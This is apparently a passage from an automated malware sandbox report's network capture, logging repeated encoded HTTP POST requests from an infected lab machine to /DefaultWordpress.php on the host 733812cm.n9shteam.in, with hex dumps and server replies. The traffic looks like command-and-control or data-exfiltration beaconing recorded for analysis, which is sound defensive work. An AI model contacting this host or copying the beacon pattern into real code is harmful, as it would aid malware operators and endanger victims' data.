                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5477fdc09854-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11119&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=130568&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          79192.168.2.550058188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:31.787585020 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:32.134706020 CEST2528OUTData Raw: 5e 5f 5c 58 5f 5e 51 5d 54 5b 52 57 50 5e 57 54 50 58 5d 5e 50 53 57 59 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^_\X_^Q]T[RWP^WTPX]^PSWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ])0-$(%W>#]385<=4Y)<(\$=/%!^3!0-&^?#F $P.4
                                                          Oct 20, 2024 18:19:32.571295023 CEST25INHTTP/1.1 100 Continue


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          80192.168.2.550059188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:32.578416109 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:32.933645010 CEST1948OUTData Raw: 5e 58 5c 5b 5a 5d 51 52 54 5b 52 57 50 5b 57 54 50 5d 5d 5f 50 53 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^X\[Z]QRT[RWP[WTP]]_PSWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ *09_&;2(30^2(=8Z>80<21/X$8)%..Y+:#F $P.
                                                          Oct 20, 2024 18:19:33.360723019 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:33.730639935 CEST945INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BEj6DSdTYa1n65XYM8vjnO4cIivuWmTjJeoo%2FQQOLf2qNw1iSaj4pm17v%2BBt%2BGmROEuOKNrG1Lx%2B6CQRdb9SSDrXLltyMhuya8W28gc4OE0FRP%2F1S6qu%2B3BvZFskKMmjP7gA4A3FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5484f9e6faa2-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13035&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=112457&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 1d 24 2c 37 51 3d 2c 2b 0c 3a 58 31 54 2c 2e 3b 19 2d 1f 36 06 30 20 3e 15 26 2a 3d 10 25 1d 01 10 22 2c 0f 01 34 01 31 1e 2e 26 28 5e 07 12 26 5a 2b 3c 34 14 29 3d 28 1b 2b 5e 2c 16 22 24 27 08 26 3e 3b 57 33 13 29 58 3d 31 3a 03 3e 04 2d 09 39 1d 29 0b 2d 06 3c 5d 20 10 22 53 03 13 25 10 3e 30 05 06 23 32 16 00 28 2d 3b 12 2b 16 2a 59 29 1d 05 12 29 3b 3b 1d 2d 3e 26 10 30 2f 34 13 32 01 3c 11 32 3a 38 09 25 3a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&$,7Q=,+:X1T,.;-60 >&*=%",41.&(^&Z+<4)=(+^,"$'&>;W3)X=1:>-9)-<] "S%>0#2(-;+*Y));;->&0/42<2:8%:$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          81192.168.2.550060188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:32.703001022 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:33.056642056 CEST2528OUTData Raw: 5e 58 5c 5a 5a 5c 51 53 54 5b 52 57 50 52 57 51 50 5d 5d 5e 50 50 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^X\ZZ\QST[RWPRWQP]]^PPWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ \)3!^21R>34'1T?>'>Y(0=2?Z32['-)(:#F $P.
                                                          Oct 20, 2024 18:19:33.488867998 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:33.861866951 CEST788INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKx0B0PCUDqigVyWFMp753qro2njKqiCWcLrY7Tul0Bj%2FMYjFhDgWVrFJbrm4V4u8p%2BlRe0h94HbKyqVLUO7UQIf7CiKexZzST3oyyMtDq9I4xv2A%2FWwSXga2W57dVh64UykLFYpcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5485cfcc96ad-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12936&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=111840&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          82192.168.2.550061188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:33.980752945 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:34.337754965 CEST2528OUTData Raw: 5b 5d 5c 59 5a 5d 54 55 54 5b 52 57 50 5d 57 5d 50 50 5d 57 50 5c 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: []\YZ]TUT[RWP]W]PP]WP\WU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#(3*%(.(3+]$8==(](?4$[/&1+$10.*(#F $P.
                                                          Oct 20, 2024 18:19:34.788548946 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:35.158361912 CEST789INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FS3dQFYYN86a%2BsqvEtAEQnw%2BMpK87A%2BH1gLmE8tGiLX8aUw8m2llYT7JL066J5337DD1NCNyFModOz4ZvmIRtx8F8MrdjudMkTQeVsrXn0JeWL2WsHBLsCtaGKfuQKfVhOHFZF4peA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a548deba02519-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13023&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=111521&cwnd=50&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          83192.168.2.550062188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:35.279772997 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:35.634623051 CEST2528OUTData Raw: 5b 59 5c 5c 5a 52 51 57 54 5b 52 57 50 5f 57 54 50 58 5d 57 50 50 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Y\\ZRQWT[RWP_WTPX]WPPW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ \)U!_2-W>0('8(.7=?&-'^&W?[%;1$X9(#F $P.0
                                                          Oct 20, 2024 18:19:36.079098940 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:36.308404922 CEST792INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:36 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HWnTKnV21W5MJ9AKhNpeJc%2BBxjHkzKkV7heW%2FXHuAYcR19N5AikDhMEbkjATC9Q1%2BnHeVTUb1GljqUWi5rjdPYITnBwTXzrhmJ6g7ck5jhxBczFOBlqsI2hBZXjya%2BECqF%2BQowEIDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5495f96367dc-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11862&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=120979&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          84192.168.2.550063188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:36.436754942 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:36.792088032 CEST2528OUTData Raw: 5b 5e 5c 5c 5f 59 51 53 54 5b 52 57 50 5c 57 50 50 58 5d 5a 50 50 57 5f 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [^\\_YQST[RWP\WPPX]ZPPW_\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ \>3&%(.<U($8<=$X(??3=[$",$.$+#F $P.<
                                                          Oct 20, 2024 18:19:37.224926949 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:37.481861115 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:37.591200113 CEST783INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9zYgi5dthEcGzEoWUMKfgX5NYwpSuuJyhitGlxUgkOgmhR8XcAMRf94TYId381RTSWv4EQcdJamJxT%2FSPARfaMpL4CXZerzePPJlL7VWhudkV5j0P09Q0hQv5EuwWZDFABhetBKwYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a549d29c22500-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11582&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=125629&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          85192.168.2.550064188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:37.716609955 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:38.072079897 CEST2520OUTData Raw: 5e 5f 5c 5c 5a 5d 51 57 54 5b 52 57 50 5a 57 52 50 5a 5d 5b 50 5d 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^_\\Z]QWT[RWPZWRPZ][P]WZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _)U.18=U<U<081W<.])'=%7'-3X6X?:#F $P.<


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          86192.168.2.550065188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:38.750596046 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:39.103277922 CEST1948OUTData Raw: 5b 51 59 59 5f 5d 51 53 54 5b 52 57 50 5e 57 57 50 5d 5d 57 50 53 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [QYY_]QST[RWP^WWP]]WPSWT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#**2:?3$8(-?>'0>#1"/';>%.)*#F $P.4
                                                          Oct 20, 2024 18:19:39.576502085 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:39.804928064 CEST933INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xvY0OL2CkUbZI1%2FprklsqPt1AcjGyAoRf006qFAecBFHYsGOuQ2EKkgbXLxdY6ppfVHOWzN1a6cS8i31trfWnQezeIskue52pehklJU4B2GPruUn3EkKgVyj7YJGzeVBx4JihrM6ug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54abdd859657-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11566&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=126099&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 5a 26 2f 37 13 3d 2c 28 53 2d 00 2e 08 2c 3e 3b 16 39 08 2e 05 33 33 25 00 25 2a 2d 10 24 33 3f 58 35 3f 2e 5b 23 11 03 55 3a 1c 28 5e 07 12 26 11 2b 02 06 14 3d 3e 2b 07 2b 38 01 04 21 27 23 41 32 3d 09 55 33 3e 25 59 3e 1f 39 12 3e 03 26 55 2e 42 25 40 3a 28 3f 01 34 00 22 53 03 13 25 10 3d 09 38 12 36 0c 23 58 2b 2d 05 5a 28 16 2a 59 3f 30 2f 12 28 06 27 5e 2c 13 00 59 27 01 0a 5f 26 01 20 5a 25 3a 23 17 33 10 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&Z&/7=,(S-.,>;9.33%%*-$3?X5?.[#U:(^&+=>++8!'#A2=U3>%Y>9>&U.B%@:(?4"S%=86#X+-Z(*Y?0/('^,Y'_& Z%:#3$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          87192.168.2.550066188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:38.873116016 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:39.228308916 CEST2520OUTData Raw: 5b 59 5c 5c 5a 58 54 55 54 5b 52 57 50 5a 57 5c 50 5d 5d 58 50 56 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Y\\ZXTUT[RWPZW\P]]XPVW[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#>2&+=<#,3)+<\=/Y$=124080:X<*#F $P.
                                                          Oct 20, 2024 18:19:40.928219080 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:41.301553965 CEST789INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O8FIWzbDb5tq2159UJW5WZlCOMIj8OUAn%2F3xI7fPnicbb9nexq%2FC5jy%2BUNy%2BE58mqvR1YQq4pX5KXq4usUevZSKRTdNfzqGf5KCuUx2XL8K4meJAHcHDVkfdvlbnEjp3Ob63tLlQfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54b44882cf16-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12981&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2831&delivery_rate=112711&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          88192.168.2.550067188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:41.437392950 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:41.790800095 CEST2528OUTData Raw: 5b 58 5c 5d 5f 5d 54 56 54 5b 52 57 50 53 57 55 50 5a 5d 5a 50 5d 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [X\]_]TVT[RWPSWUPZ]ZP]WU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ )3%Y1:+3 $+,]*Y+'.3[$"7Z'+&06^+:#F $P.
                                                          Oct 20, 2024 18:19:42.879352093 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:43.257566929 CEST787INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZENAGjRd4Sd0HUta8zGn1e42p9anWv9Gqa5AH5w9X17Qul1cSGxYkzUwLqgu%2FLGmoVjFzPN%2FeRfNN1qHj3pAT1rrth9Q21UyN9Llk9DRgIs3VHNjDGgvvVAKgqVIUe8%2FT1fBjnSrAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54c07aa396e9-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11647&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=123813&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          89192.168.2.550068188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:43.394727945 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
